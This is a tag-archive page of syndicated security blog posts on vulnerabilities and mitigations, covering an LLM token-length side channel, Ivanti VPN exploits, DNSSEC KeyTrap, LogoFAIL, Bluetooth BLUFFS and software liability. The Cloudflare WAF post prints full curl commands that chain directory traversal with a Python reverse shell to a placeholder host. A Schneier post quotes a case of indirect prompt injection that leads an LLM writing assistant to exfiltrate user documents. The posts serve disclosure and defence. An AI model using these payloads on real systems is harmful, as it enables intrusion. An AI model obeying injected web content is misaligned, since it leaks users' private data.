Tag Archives: vulnerabilities

Mitigating a token-length side-channel attack in our AI products

Post Syndicated from Celso Martinho original https://blog.cloudflare.com/ai-side-channel-attack-mitigated


Since the discovery of CRIME, BREACH, TIME, LUCKY-13 etc., length-based side-channel attacks have been considered practical. Even though packets were encrypted, attackers were able to infer information about the underlying plaintext by analyzing metadata like the packet length or timing information.

Cloudflare was recently contacted by a group of researchers at Ben Gurion University who wrote a paper titled “What Was Your Prompt? A Remote Keylogging Attack on AI Assistants” that describes “a novel side-channel that can be used to read encrypted responses from AI Assistants over the web”.
The Workers AI and AI Gateway team collaborated closely with these security researchers through our Public Bug Bounty program, discovering and fully patching a vulnerability that affects LLM providers. You can read the detailed research paper here.

Since being notified about this vulnerability, we’ve implemented a mitigation to help secure all Workers AI and AI Gateway customers. As far as we could assess, there was no outstanding risk to Workers AI and AI Gateway customers.

How does the side-channel attack work?

In the paper, the authors describe a method in which they intercept the stream of a chat session with an LLM provider, use the network packet headers to infer the length of each token, extract and segment their sequence, and then use their own dedicated LLMs to infer the response.

The two main requirements for a successful attack are an AI chat client running in streaming mode and a malicious actor capable of capturing network traffic between the client and the AI chat service. In streaming mode, the LLM tokens are emitted sequentially, introducing a token-length side-channel. Malicious actors could eavesdrop on packets via public networks or within an ISP.

An example request vulnerable to the side-channel attack looks like this:

curl -X POST \
https://api.cloudflare.com/client/v4/accounts/<account-id>/ai/run/@cf/meta/llama-2-7b-chat-int8 \
  -H "Authorization: Bearer <Token>" \
  -d '{"stream":true,"prompt":"tell me something about portugal"}'

Let’s use Wireshark to inspect the network packets on the LLM chat session while streaming:

The first packet has a length of 95 and corresponds to the token “Port” which has a length of four. The second packet has a length of 93 and corresponds to the token “ug” which has a length of two, and so on. By removing the likely token envelope from the network packet length, it is easy to infer how many tokens were transmitted and their sequence and individual length just by sniffing encrypted network data.

Since the attacker needs the sequence of individual token length, this vulnerability only affects text generation models using streaming. This means that AI inference providers that use streaming — the most common way of interacting with LLMs — like Workers AI, are potentially vulnerable.

This method requires that the attacker is on the same network or in a position to observe the communication traffic and its accuracy depends on knowing the target LLM’s writing style. In ideal conditions, the researchers claim that their system “can reconstruct 29% of an AI assistant’s responses and successfully infer the topic from 55% of them”. It’s also important to note that unlike other side-channel attacks, in this case the attacker has no way of evaluating its prediction against the ground truth. That means that we are as likely to get a sentence with near perfect accuracy as we are to get one where only things that match are conjunctions.

Mitigating LLM side-channel attacks

Since this type of attack relies on the length of tokens being inferred from the packet, it can be just as easily mitigated by obscuring token size. The researchers suggested a few strategies to mitigate these side-channel attacks, one of which is the simplest: padding the token responses with random length noise to obscure the length of the token so that responses can not be inferred from the packets. While we immediately added the mitigation to our own inference product — Workers AI, we wanted to help customers secure their LLMs regardless of where they are running them by adding it to our AI Gateway.

As of today, all users of Workers AI and AI Gateway are now automatically protected from this side-channel attack.

What we did

Once we got word of this research work and how exploiting the technique could potentially impact our AI products, we did what we always do in situations like this: we assembled a team of systems engineers, security engineers, and product managers and started discussing risk mitigation strategies and next steps. We also had a call with the researchers, who kindly attended, presented their conclusions, and answered questions from our teams.

Unfortunately, at this point, this research does not include actual code that we can use to reproduce the claims or the effectiveness and accuracy of the described side-channel attack. However, we think that the paper has theoretical merit, that it provides enough detail and explanations, and that the risks are not negligible.

We decided to incorporate the first mitigation suggestion in the paper: including random padding to each message to hide the actual length of tokens in the stream, thereby complicating attempts to infer information based solely on network packet size.

Workers AI, our inference product, is now protected

With our inference-as-a-service product, anyone can use the Workers AI platform and make API calls to our supported AI models. This means that we oversee the inference requests being made to and from the models. As such, we have a responsibility to ensure that the service is secure and protected from potential vulnerabilities. We immediately rolled out a fix once we were notified of the research, and all Workers AI customers are now automatically protected from this side-channel attack. We have not seen any malicious attacks exploiting this vulnerability, other than the ethical testing from the researchers.

Our solution for Workers AI is a variation of the mitigation strategy suggested in the research document. Since we stream JSON objects rather than the raw tokens, instead of padding the tokens with whitespace characters, we added a new property, “p” (for padding) that has a string value of variable random length.

Example streaming response using the SSE syntax:

data: {"response":"portugal","p":"abcdefghijklmnopqrstuvwxyz0123456789a"}
data: {"response":" is","p":"abcdefghij"}
data: {"response":" a","p":"abcdefghijklmnopqrstuvwxyz012"}
data: {"response":" southern","p":"ab"}
data: {"response":" European","p":"abcdefgh"}
data: {"response":" country","p":"abcdefghijklmno"}
data: {"response":" located","p":"abcdefghijklmnopqrstuvwxyz012345678"}

This has the advantage that no modifications are required in the SDK or the client code, the changes are invisible to the end-users, and no action is required from our customers. By adding random variable length to the JSON objects, we introduce the same network-level variability, and the attacker essentially loses the required input signal. Customers can continue using Workers AI as usual while benefiting from this protection.

One step further: AI Gateway protects users of any inference provider

We added protection to our AI inference product, but we also have a product that proxies requests to any provider — AI Gateway. AI Gateway acts as a proxy between a user and supported inference providers, helping developers gain control, performance, and observability over their AI applications. In line with our mission to help build a better Internet, we wanted to quickly roll out a fix that can help all our customers using text generation AIs, regardless of which provider they use or if they have mitigations to prevent this attack. To do this, we implemented a similar solution that pads all streaming responses proxied through AI Gateway with random noise of variable length.

Our AI Gateway customers are now automatically protected against this side-channel attack, even if the upstream inference providers have not yet mitigated the vulnerability. If you are unsure if your inference provider has patched this vulnerability yet, use AI Gateway to proxy your requests and ensure that you are protected.

Conclusion

At Cloudflare, our mission is to help build a better Internet – that means that we care about all citizens of the Internet, regardless of what their tech stack looks like. We are proud to be able to improve the security of our AI products in a way that is transparent and requires no action from our customers.

We are grateful to the researchers who discovered this vulnerability and have been very collaborative in helping us understand the problem space. If you are a security researcher who is interested in helping us make our products more secure, check out our Bug Bounty program at hackerone.com/cloudflare.

Eliminate VPN vulnerabilities with Cloudflare One

Post Syndicated from Dan Hall original https://blog.cloudflare.com/eliminate-vpn-vulnerabilities-with-cloudflare-one


On January 19, 2024, the Cybersecurity & Infrastructure Security Agency (CISA) issued Emergency Directive 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities. CISA has the authority to issue emergency directives in response to a known or reasonably suspected information security threat, vulnerability, or incident. U.S. Federal agencies are required to comply with these directives.

Federal agencies were directed to apply a mitigation against two recently discovered vulnerabilities; the mitigation was to be applied within three days. Further monitoring by CISA revealed that threat actors were continuing to exploit the vulnerabilities and had developed some workarounds to earlier mitigations and detection methods. On January 31, CISA issued Supplemental Direction V1 to the Emergency Directive instructing agencies to immediately disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure products from agency networks and perform several actions before bringing the products back into service.

This blog post will explore the threat actor’s tactics, discuss the high-value nature of the targeted products, and show how Cloudflare’s Secure Access Service Edge (SASE) platform protects against such threats.

As a side note and showing the value of layered protections, Cloudflare’s WAF had proactively detected the Ivanti zero-day vulnerabilities and deployed emergency rules to protect Cloudflare customers.

Threat Actor Tactics

Forensic investigations (see the Volexity blog for an excellent write-up) indicate that the attacks began as early as December 2023. Piecing together the evidence shows that the threat actors chained two previously unknown vulnerabilities together to gain access to the Connect Secure and Policy Secure appliances and achieve unauthenticated remote code execution (RCE).

CVE-2023-46805 is an authentication bypass vulnerability in the products’ web components that allows a remote attacker to bypass control checks and gain access to restricted resources. CVE-2024-21887 is a command injection vulnerability in the products’ web components that allows an authenticated administrator to execute arbitrary commands on the appliance and send specially crafted requests. The remote attacker was able to bypass authentication and be seen as an “authenticated” administrator, and then take advantage of the ability to execute arbitrary commands on the appliance.

By exploiting these vulnerabilities, the threat actor had near total control of the appliance. Among other things, the attacker was able to:

  • Harvest credentials from users logging into the VPN service
  • Use these credentials to log into protected systems in search of even more credentials
  • Modify files to enable remote code execution
  • Deploy web shells to a number of web servers
  • Reverse tunnel from the appliance back to their command-and-control server (C2)
  • Avoid detection by disabling logging and clearing existing logs

Little Appliance, Big Risk

This is a serious incident that is exposing customers to significant risk. CISA is justified in issuing their directive, and Ivanti is working hard to mitigate the threat and develop patches for the software on their appliances. But it also serves as another indictment of the legacy “castle-and-moat” security paradigm. In that paradigm, remote users were outside the castle while protected applications and resources remained inside. The moat, consisting of a layer of security appliances, separated the two. The moat, in this case the Ivanti appliance, was responsible for authenticating and authorizing users, and then connecting them to protected applications and resources. Attackers and other bad actors were blocked at the moat.

This incident shows us what happens when a bad actor is able to take control of the moat itself, and the challenges customers face to recover control. Two typical characteristics of vendor-supplied appliances and the legacy security strategy highlight the risks:

  • Administrators have access to the internals of the appliance
  • Authenticated users indiscriminately have access to a wide range of applications and resources on the corporate network, increasing the risk of bad actor lateral movement

A better way: Cloudflare’s SASE platform

Cloudflare One is Cloudflare’s SSE and single-vendor SASE platform. While Cloudflare One spans broadly across security and networking services (and you can read about the latest additions here), I want to focus on the two points noted above.

First, Cloudflare One employs the principles of Zero Trust, including the principle of least privilege. As such, users that authenticate successfully only have access to the resources and applications necessary for their role. This principle also helps in the event of a compromised user account as the bad actor does not have indiscriminate network-level access. Rather, least privilege limits the range of lateral movement that a bad actor has, effectively reducing the blast radius.

Second, while customer administrators need to have access to configure their services and policies, Cloudflare One does not provide any external access to the system internals of Cloudflare’s platform. Without that access, a bad actor would not be able to launch the types of attacks executed when they had access to the internals of the Ivanti appliance.  

It’s time to eliminate the legacy VPN

If your organization is impacted by the CISA directive, or you are just ready to modernize and want to augment or replace your current VPN solution, Cloudflare is here to help. Cloudflare’s Zero Trust Network Access (ZTNA) service, part of the Cloudflare One platform, is the fastest and safest way to connect any user to any application.

Contact us to get immediate onboarding help or to schedule an architecture workshop to help you augment or replace your Ivanti (or any) VPN solution.
Not quite ready for a live conversation? Read our learning path article on how to replace your VPN with Cloudflare or our SASE reference architecture for a view of how all of our SASE services and on-ramps work together.

Remediating new DNSSEC resource exhaustion vulnerabilities

Post Syndicated from Vicky Shrestha original https://blog.cloudflare.com/remediating-new-dnssec-resource-exhaustion-vulnerabilities


Cloudflare has been part of a multivendor, industry-wide effort to mitigate two critical DNSSEC vulnerabilities. These vulnerabilities exposed significant risks to critical infrastructures that provide DNS resolution services. Cloudflare provides DNS resolution for anyone to use for free with our public resolver 1.1.1.1 service. Mitigations for Cloudflare’s public resolver 1.1.1.1 service were applied before these vulnerabilities were disclosed publicly. Internal resolvers using unbound (open source software) were upgraded promptly after a new software version fixing these vulnerabilities was released.

All Cloudflare DNS infrastructure was protected from both of these vulnerabilities before they were disclosed and is safe today. These vulnerabilities do not affect our Authoritative DNS or DNS firewall products.

All major DNS software vendors have released new versions of their software. All other major DNS resolver providers have also applied appropriate mitigations. Please update your DNS resolver software immediately, if you haven’t done so already.

Background

Domain name system (DNS) security extensions, commonly known as DNSSEC, are extensions to the DNS protocol that add authentication and integrity capabilities. DNSSEC uses cryptographic keys and signatures that allow DNS responses to be validated as authentic. DNSSEC protocol specifications have certain requirements that prioritize availability at the cost of increased complexity and computational cost for the validating DNS resolvers. The mitigations for the vulnerabilities discussed in this blog require local policies to be applied that relax these requirements in order to avoid exhausting the resources of validators.

The design of the DNS and DNSSEC protocols follows the Robustness principle: “be conservative in what you do, be liberal in what you accept from others”. There have been many vulnerabilities in the past that have taken advantage of protocol requirements following this principle. Malicious actors can exploit these vulnerabilities to attack DNS infrastructure, in this case by causing additional work for DNS resolvers by crafting DNSSEC responses with complex configurations. As is often the case, we find ourselves having to create a pragmatic balance between the flexibility that allows a protocol to adapt and evolve and the need to safeguard the stability and security of the services we operate.

Cloudflare’s public resolver 1.1.1.1 is a privacy-centric public resolver service. We have been using stricter validations and limits aimed at protecting our own infrastructure in addition to shielding authoritative DNS servers operated outside our network. As a result, we often receive complaints about resolution failures. Experience shows us that strict validations and limits can impact availability in some edge cases, especially when DNS domains are improperly configured. However, these strict validations and limits are necessary to improve the overall reliability and resilience of the DNS infrastructure.

The vulnerabilities and how we mitigated them are described below.

Keytrap vulnerability (CVE-2023-50387)

Introduction

A DNSSEC signed zone can contain multiple keys (DNSKEY) to sign the contents of a DNS zone and a Resource Record Set (RRSET) in a DNS response can have multiple signatures (RRSIG). Multiple keys and signatures are required to support things like key rollover, algorithm rollover, and multi-signer DNSSEC. DNSSEC protocol specifications require a validating DNS resolver to try every possible combination of keys and signatures when validating a DNS response.

During validation, a resolver looks at the key tag of every signature and tries to find the associated key that was used to sign it. A key tag is an unsigned 16-bit number calculated as a checksum over the key’s resource data (RDATA). Key tags are intended to allow efficient pairing of a signature with the key which has supposedly created it.  However, key tags are not unique, and it is possible that multiple keys can have the same key tag. A malicious actor can easily craft a DNS response with multiple keys having the same key tag together with multiple signatures, none of which might validate. A validating resolver would have to try every combination (number of keys multiplied by number of signatures) when trying to validate this response. This increases the computational cost of the validating resolver many-fold, degrading performance for all its users. This is known as the Keytrap vulnerability.

Variations of this vulnerability include using multiple signatures with one key, using one signature with multiple keys having colliding key tags, and using multiple keys with corresponding hashes added to the parent delegation signer record.

Mitigation

We have limited the maximum number of keys we will accept at a zone cut. A zone cut is where a parent zone delegates to a child zone, e.g. where the .com zone delegates cloudflare.com to Cloudflare nameservers. Even with this limit already in place and various other protections built for our platform, we realized that it would still be computationally costly to process a malicious DNS answer from an authoritative DNS server.

To address and further mitigate this vulnerability, we added a signature validations limit per RRSET and a total signature validations limit per resolution task. One resolution task might include multiple recursive queries to external authoritative DNS servers in order to answer a single DNS question. Clients queries exceeding these limits will fail to resolve and will receive a response with an Extended DNS Error (EDE) code 0. Furthermore, we added metrics which will allow us to detect attacks attempting to exploit this vulnerability.

NSEC3 iteration and closest encloser proof vulnerability (CVE-2023-50868)

Introduction

NSEC3 is an alternative approach for authenticated denial of existence. You can learn more about authenticated denial of existence here. NSEC3 uses a hash derived from DNS names instead of the DNS names directly in an attempt to prevent zone enumeration and the standard supports multiple iterations for hash calculations. However, because the full DNS name is used as input to the hash calculation, increasing hashing iterations beyond the initial doesn’t provide any additional value and is not recommended in RFC9276. This complication is further inflated while finding the closest enclosure proof. A malicious DNS response from an authoritative DNS server can set a high NSEC3 iteration count and long DNS names with multiple DNS labels to exhaust the computing resources of a validating resolver by making it do unnecessary hash computations.

Mitigation

For this vulnerability, we applied a similar mitigation technique as we did for Keytrap. We added a limit for total hash calculations per resolution task to answer a single DNS question. Similarly, clients queries exceeding this limit will fail to resolve and will receive a response with an EDE code 27. We also added metrics to track hash calculations allowing early detection of attacks attempting to exploit this vulnerability.

Timeline

Date and time in UTC

Event

2023-11-03 16:05

John Todd from Quad9 invites Cloudflare to participate in a joint task force to discuss a new DNS vulnerability. 

2023-11-07 14:30

A group of DNS vendors and service providers meet to discuss the vulnerability during IETF 118. Discussions and collaboration continues in a closed chat group hosted at DNS-OARC

2023-12-08 20:20

Cloudflare public resolver 1.1.1.1 is fully patched to mitigate Keytrap vulnerability (CVE-2023-50387)

2024-01-17 22:39

Cloudflare public resolver 1.1.1.1 is fully patched to mitigate NSEC3 iteration count and closest encloser vulnerability (CVE-2023-50868)

2024-02-13 13:04

Unbound package is released 

2024-02-13 23:00

Cloudflare internal CDN resolver is fully patched to mitigate both CVE-2023-50387 and CVE-2023-50868

Credits

We would like to thank Elias Heftrig, Haya Schulmann, Niklas Vogel, Michael Waidner from the German National Research Center for Applied Cybersecurity ATHENE, for discovering the Keytrap vulnerability and doing a responsible disclosure.

We would like to thank Petr Špaček from Internet Systems Consortium (ISC) for discovering the NSEC3 iteration and closest encloser proof vulnerability and doing a responsible disclosure.

We would like to thank John Todd from Quad9  and the DNS Operations Analysis and Research Center (DNS-OARC) for facilitating coordination amongst various stakeholders.

And finally, we would like to thank the DNS-OARC community members, representing various DNS vendors and service providers, who all came together and worked tirelessly to fix these vulnerabilities, working towards a common goal of making the internet resilient and secure.

On the Insecurity of Software Bloat

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/on-the-insecurity-of-software-bloat.html

Good essay on software bloat and the insecurities it causes.

The world ships too much code, most of it by third parties, sometimes unintended, most of it uninspected. Because of this, there is a huge attack surface full of mediocre code. Efforts are ongoing to improve the quality of code itself, but many exploits are due to logic fails, and less progress has been made scanning for those. Meanwhile, great strides could be made by paring down just how much code we expose to the world. This will increase time to market for products, but legislation is around the corner that should force vendors to take security more seriously.

On Software Liabilities

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/on-software-liabilities.html

Over on Lawfare, Jim Dempsey published a really interesting proposal for software liability: “Standard for Software Liability: Focus on the Product for Liability, Focus on the Process for Safe Harbor.”

Section 1 of this paper sets the stage by briefly describing the problem to be solved. Section 2 canvasses the different fields of law (warranty, negligence, products liability, and certification) that could provide a starting point for what would have to be legislative action establishing a system of software liability. The conclusion is that all of these fields would face the same question: How buggy is too buggy? Section 3 explains why existing software development frameworks do not provide a sufficiently definitive basis for legal liability. They focus on process, while a liability regime should begin with a focus on the product—­that is, on outcomes. Expanding on the idea of building codes for building code, Section 4 shows some examples of product-focused standards from other fields. Section 5 notes that already there have been definitive expressions of software defects that can be drawn together to form the minimum legal standard of security. It specifically calls out the list of common software weaknesses tracked by the MITRE Corporation under a government contract. Section 6 considers how to define flaws above the minimum floor and how to limit that liability with a safe harbor.

Full paper here.

Dempsey basically creates three buckets of software vulnerabilities: easy stuff that the vendor should have found and fixed, hard-to-find stuff that the vendor couldn’t be reasonably expected to find, and the stuff in the middle. He draws from other fields—consumer products, building codes, automobile design—to show that courts can deal with the stuff in the middle.

I have long been a fan of software liability as a policy mechanism for improving cybersecurity. And, yes, software is complicated, but we shouldn’t let the perfect be the enemy of the good.

In 2003, I wrote:

Clearly this isn’t all or nothing. There are many parties involved in a typical software attack. There’s the company who sold the software with the vulnerability in the first place. There’s the person who wrote the attack tool. There’s the attacker himself, who used the tool to break into a network. There’s the owner of the network, who was entrusted with defending that network. One hundred percent of the liability shouldn’t fall on the shoulders of the software vendor, just as one hundred percent shouldn’t fall on the attacker or the network owner. But today one hundred percent of the cost falls on the network owner, and that just has to stop.

Courts can adjudicate these complex liability issues, and have figured this thing out in other areas. Automobile accidents involve multiple drivers, multiple cars, road design, weather conditions, and so on. Accidental restaurant poisonings involve suppliers, cooks, refrigeration, sanitary conditions, and so on. We don’t let the fact that no restaurant can possibly fix all of the food-safety vulnerabilities lead us to the conclusion that restaurants shouldn’t be responsible for any food-safety vulnerabilities, yet I hear that line of reasoning regarding software vulnerabilities all of the time.

How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability

Post Syndicated from Himanshu Anand http://blog.cloudflare.com/author/himanshu/ original https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability


Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare’s Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.

The threat: CVE-2023-46805 and CVE-2024-21887

An authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) impacting Ivanti products were recently disclosed and analyzed by AttackerKB. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.

Technical analysis

As discussed in AttackerKB, the attacker can send a specially crafted request to the target system using a command like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B

This command targets an endpoint (/license/keys-status/) that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include /api/v1/totp/user-backup-code/../../license/keys-status/. This technique is known as directory traversal.

The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:

;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';

The Python reverse shell is a way for the attacker to gain control over the target system.

The vulnerability exists in the way the system processes the node_name parameter. If an attacker can control the value of node_name, they can inject commands into the system.

To elaborate on ‘node_name’: The ‘node_name’ parameter is a component of the endpoint /api/v1/license/keys-status/path:node_name. This endpoint is where the issue primarily occurs.

The attacker can send a GET request to the URI path /api/v1/totp/user-backup-code/../../license/keys-status/;CMD; where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.

Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.

The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn’t need to be URL-encoded:

{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}

Although the /api/v1/system/maintenance/archiving/cloud-server-test-connection endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection to reach this endpoint and exploit the vulnerability.

To execute an unauthenticated operating system command, an attacker would use a curl request like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'

Cloudflare’s proactive defense

Cloudflare WAF is supported by an additional AI-powered layer called WAF Attack Score, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate if the request is malicious or not; focusing on three main categories until now: XSS, SQLi, and some RCE variations (Command Injection, ApacheLog4J, etc.). The score ranges from 1 to 99 and the lower the score the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.

Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 using Cloudflare’s dashboard (Security > Events). Attack Score analysis results consist of three individual scores, each labeled to indicate their relevance to a specific attack category. There’s also a global score, “WAF Attack Score”, which considers the combined impact of these three scores. In some cases, the global score is affected by one of the sub-scores if the attack matches a category, here we can see the dominant sub-score is Remote Code Execution “WAF RCE Attack Score”.

Similarly, for the unauthenticated operating system command request, we received “WAF Attack Score: 19” from the AI model which also lies under the malicious request category. Worth mentioning the example scores are not fixed numbers and may vary based on the incoming attack variation.

The great news here is: customers on Enterprise and Business plans with WAF attack score enabled, along with a rule to block low scores (e.g. cf.waf.score le 20) or (cf.waf.score.class eqattack“) for Business, were already shielded from potential vulnerability exploits that were tested so far even before the vulnerability was announced.

Emergency rule deployment

In response to this critical vulnerability, Cloudflare released Emergency Rules on January 17, 2024, Within 24 hours after the proof of concept went public. These rules are part of its Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named “Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887,” are developed to block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.

Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.

Rule ID Description Default Action
New Managed Rule…34ab53c5 Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 Block
Legacy Managed Rule
100622
Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 Block

Implications and best practices

Cloudflare’s response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend customers to deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.

Conclusion

Cloudflare’s proactive approach to cybersecurity using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how threats and attacks can be identified before they are made public and vulnerabilities disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.

Data Exfiltration Using Indirect Prompt Injection

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/data-exfiltration-using-indirect-prompt-injection.html

Interesting attack on a LLM:

In Writer, users can enter a ChatGPT-like session to edit or create their documents. In this chat session, the LLM can retrieve information from sources on the web to assist users in creation of their documents. We show that attackers can prepare websites that, when a user adds them as a source, manipulate the LLM into sending private information to the attacker or perform other malicious activities.

The data theft can include documents the user has uploaded, their chat history or potentially specific private information the chat model can convince the user to divulge at the attacker’s behest.

New Windows/Linux Firmware Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/new-windows-linux-firmware-attack.html

Interesting attack based on malicious pre-OS logo images:

LogoFAIL is a constellation of two dozen newly discovered vulnerabilities that have lurked for years, if not decades, in Unified Extensible Firmware Interfaces responsible for booting modern devices that run Windows or Linux….

The vulnerabilities are the subject of a coordinated mass disclosure released Wednesday. The participating companies comprise nearly the entirety of the x64 and ARM CPU ecosystem, starting with UEFI suppliers AMI, Insyde, and Phoenix (sometimes still called IBVs or independent BIOS vendors); device manufacturers such as Lenovo, Dell, and HP; and the makers of the CPUs that go inside the devices, usually Intel, AMD or designers of ARM CPUs….

As its name suggests, LogoFAIL involves logos, specifically those of the hardware seller that are displayed on the device screen early in the boot process, while the UEFI is still running. Image parsers in UEFIs from all three major IBVs are riddled with roughly a dozen critical vulnerabilities that have gone unnoticed until now. By replacing the legitimate logo images with identical-looking ones that have been specially crafted to exploit these bugs, LogoFAIL makes it possible to execute malicious code at the most sensitive stage of the boot process, which is known as DXE, short for Driver Execution Environment.

“Once arbitrary code execution is achieved during the DXE phase, it’s game over for platform security,” researchers from Binarly, the security firm that discovered the vulnerabilities, wrote in a whitepaper. “From this stage, we have full control over the memory and the disk of the target device, thus including the operating system that will be started.”

From there, LogoFAIL can deliver a second-stage payload that drops an executable onto the hard drive before the main OS has even started.

Details.

It’s an interesting vulnerability. Corporate buyers want the ability to display their own logos, and not the logos of the hardware makers. So the ability has to be in the BIOS, which means that the vulnerabilities aren’t being protected by any of the OS’s defenses. And the BIOS makers probably pulled some random graphics library off the Internet and never gave it a moment’s thought after that.

New Bluetooth Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/new-bluetooth-attack.html

New attack breaks forward secrecy in Bluetooth.

Three news articles:

BLUFFS is a series of exploits targeting Bluetooth, aiming to break Bluetooth sessions’ forward and future secrecy, compromising the confidentiality of past and future communications between devices.

This is achieved by exploiting four flaws in the session key derivation process, two of which are new, to force the derivation of a short, thus weak and predictable session key (SKC).

Next, the attacker brute-forces the key, enabling them to decrypt past communication and decrypt or manipulate future communications.

The vulnerability has been around for at least a decade.

Breaking Laptop Fingerprint Sensors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/breaking-laptop-fingerprint-sensors.html

They’re not that good:

Security researchers Jesse D’Aguanno and Timo Teräs write that, with varying degrees of reverse-engineering and using some external hardware, they were able to fool the Goodix fingerprint sensor in a Dell Inspiron 15, the Synaptic sensor in a Lenovo ThinkPad T14, and the ELAN sensor in one of Microsoft’s own Surface Pro Type Covers. These are just three laptop models from the wide universe of PCs, but one of these three companies usually does make the fingerprint sensor in every laptop we’ve reviewed in the last few years. It’s likely that most Windows PCs with fingerprint readers will be vulnerable to similar exploits.

Details.

Email Security Flaw Found in the Wild

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/email-security-flaw-found-in-the-wild.html

Google’s Threat Analysis Group announced a zero-day against the Zimbra Collaboration email server that has been used against governments around the world.

TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and authentication tokens. Most of this activity occurred after the initial fix became public on Github. To ensure protection against these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security updates as soon as they become available.

The vulnerability was discovered in June. It has been patched.

Friday Squid Blogging: Unpatched Vulnerabilities in the Squid Caching Proxy

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/friday-squid-blogging-unpatched-vulnerabilities-in-the-squid-caching-proxy.html

In a rare squid/security post, here’s an article about unpatched vulnerabilities in the Squid caching proxy.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Leaving Authentication Credentials in Public Code

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/leaving-authentication-credentials-in-public-code.html

Interesting article about a surprisingly common vulnerability: programmers leaving authentication credentials and other secrets in publicly accessible software code:

Researchers from security firm GitGuardian this week reported finding almost 4,000 unique secrets stashed inside a total of 450,000 projects submitted to PyPI, the official code repository for the Python programming language. Nearly 3,000 projects contained at least one unique secret. Many secrets were leaked more than once, bringing the total number of exposed secrets to almost 57,000.

[…]

